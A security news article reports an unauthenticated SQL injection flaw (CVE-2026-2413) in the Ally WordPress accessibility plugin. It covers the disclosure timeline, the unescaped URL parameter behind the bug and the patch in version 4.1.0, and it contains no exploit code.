Critical SQL Injection Bug in Ally Plugin Threatens 400,000+ WordPress Sites
On February 4, 2026, a critical SQL injection flaw (CVE-2026-2413) was discovered in the Ally WordPress plugin, putting over 400,000 websites at risk. The unauthenticated SQL injection vulnerability, tracked as CVE-2026-2413 (CVSS score 7.5), allows attackers to extract sensitive data from affected sites. In this article, we'll delve into the details of the vulnerability, its impact, and the measures taken to address it.
The Ally WordPress plugin, formerly known as One Click Accessibility, is a free plugin used by over 400,000 websites. It offers an accessibility scanner with AI suggestions, a usability widget for visitors, and an automated accessibility statement generator. Despite its widespread use, the plugin's developer, Elementor, had not addressed a critical SQL injection vulnerability in the plugin's code. The vulnerability stems from insecure handling of the subscribers query in Ally, where the plugin builds a SQL JOIN query using a page URL parameter without properly escaping and parameterizing the query.
The issue was responsibly reported by Drew Webber, an offensive security engineer at Acquia, through the Wordfence Bug Bounty Program, earning an $800 bounty. Wordfence notified Elementor on February 13, and the vendor acknowledged the report on February 15. A patch for the vulnerability was released on February 23, 2026, for Ally version 4.1.0. Users are urged to update to the latest patched version of the plugin to mitigate the risk.
The vulnerability is due to insufficient escaping on the user-supplied URL parameter in the `get_global_remediations()` method, where it is directly concatenated into an SQL JOIN clause without proper sanitization for SQL context. Although `esc_url_raw()` is applied for URL safety, it does not prevent SQL metacharacters (single quotes, parentheses) from being injected. This allows attackers to inject malicious SQL and exploit the vulnerability using time-based blind SQL injection, using CASE statements and SLEEP() delays, to gradually extract sensitive information from the database.
To exploit the vulnerability, an attacker needs to manipulate the page URL parameter to inject malicious SQL code. The plugin's developers addressed the issue by using the `wpdb->prepare()` function in the JOIN statement, which properly escapes and parameterizes queries, preventing SQL injection.
The development team's patch for the vulnerability has been incorporated into Ally version 4.1.0, which is now the recommended version for users. As the advisory published by WordFence states, "The Ally – Web Accessibility & Usability plugin for WordPress is vulnerable to SQL Injection via the URL path in all versions up to, and including, 4.0.3." We encourage WordPress users to verify that their sites are updated to the latest patched version of Ally as soon as possible, considering the critical nature of this vulnerability.
In conclusion, the critical SQL injection bug in the Ally plugin highlights the importance of regular security audits and vulnerability testing for WordPress plugins. It also emphasizes the need for responsible disclosure and coordination between developers, security researchers, and vendors to address identified vulnerabilities quickly and effectively. By staying informed about the latest security threats and taking proactive measures to secure their websites, WordPress users can minimize the risk of data breaches and protect their sensitive data.